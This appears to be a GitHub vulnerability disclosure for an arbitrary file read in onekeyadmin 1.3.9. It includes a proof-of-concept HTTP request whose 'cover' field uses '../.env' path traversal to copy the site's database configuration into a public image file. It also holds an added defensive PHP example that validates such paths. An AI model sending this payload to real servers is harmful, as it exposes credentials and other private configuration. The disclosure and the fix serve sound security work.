Background development assistant arbitrary file reading vulnerability #4

Open
qbz95aaa opened this issue Jan 10, 2023 · 1 comment

qbz95aaa commented Jan 10, 2023

Vulnerability affects product: onekeyadmin
Vulnerability affects version: 1.3.9
Vulnerability type: file reading
Vulnerability details:
Vulnerability location:
`app\admin\controller\Curd#code`. Here the file_get_contents function is called without any filtering.

So we can write the file we want to read into menu.png to cause any file to be read

Vulnerability recurrence
Here we read the database configuration file .env in the root directory

poc
```
POST /admin1/curd/code HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 59
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin1/curd/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def
Connection: close

{"name":"test","title":"test","cover":"../.env","table":[]}
```

You can see that the file was successfully written to our menu.png, causing any file to be read
http://192.168.3.129:8091/plugins/test/menu.png
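One way to close the hole described in this issue, shown as an added example that is not onekeyadmin's code or a patch from the project: resolve the user-supplied `cover` under a fixed directory, refuse anything that escapes it, and require real image content before its bytes can be copied to `menu.png`. The function name `readCoverImage`, the `uploads` directory and the demo files are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Hypothetical helper (not project code): return the bytes of $cover only if it
// resolves inside $allowedBase and is a real PNG/JPEG/GIF. Throws otherwise.
function readCoverImage(string $cover, string $allowedBase): string
{
    $base = realpath($allowedBase);
    if ($base === false) {
        throw new RuntimeException('allowed base directory missing');
    }
    // Refuse URL-style stream wrappers and NUL bytes before touching the filesystem.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $cover) || strpos($cover, "\0") !== false) {
        throw new InvalidArgumentException('cover must be a plain relative path');
    }
    // realpath() collapses "../" and symlinks; false means the file does not exist.
    $resolved = realpath($base . DIRECTORY_SEPARATOR . $cover);
    if ($resolved === false || !is_file($resolved)) {
        throw new InvalidArgumentException('cover not found');
    }
    // The canonical path must still sit under the base directory.
    if (strncmp($resolved, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new InvalidArgumentException('cover escapes the allowed directory');
    }
    // Content check: a config or source file is not an image, whatever its name.
    $info = @getimagesize($resolved);
    if ($info === false || !in_array($info[2], [IMAGETYPE_PNG, IMAGETYPE_JPEG, IMAGETYPE_GIF], true)) {
        throw new InvalidArgumentException('cover is not a PNG/JPEG/GIF image');
    }
    $data = file_get_contents($resolved);
    if ($data === false) {
        throw new RuntimeException('cover could not be read');
    }
    return $data;
}
// Constructed demo tree: uploads/ok.png, uploads/notes.txt and a sibling .env.
$root = sys_get_temp_dir() . '/cover_demo_' . bin2hex(random_bytes(4));
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/.env", "DB_PASS=constructed-secret\n");
$png = "\x89PNG\r\n\x1a\n" . pack('N', 13) . 'IHDR' . pack('NN', 1, 1) . "\x08\x06\x00\x00\x00";
file_put_contents("$root/uploads/ok.png", $png);
file_put_contents("$root/uploads/notes.txt", "constructed text file\n");
foreach (['ok.png', 'notes.txt', '../.env'] as $cover) {
    try {
        echo "$cover: accepted (", strlen(readCoverImage($cover, "$root/uploads")), " bytes)\n";
    } catch (Throwable $e) {
        echo "$cover: rejected (", $e->getMessage(), ")\n";
    }
}
```

Only `ok.png` is accepted: `notes.txt` fails the image check and `../.env` fails the containment check, so neither would be written to the web-readable `menu.png`.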

@qbz95aaa

Found by Chaitin Security Research Lab
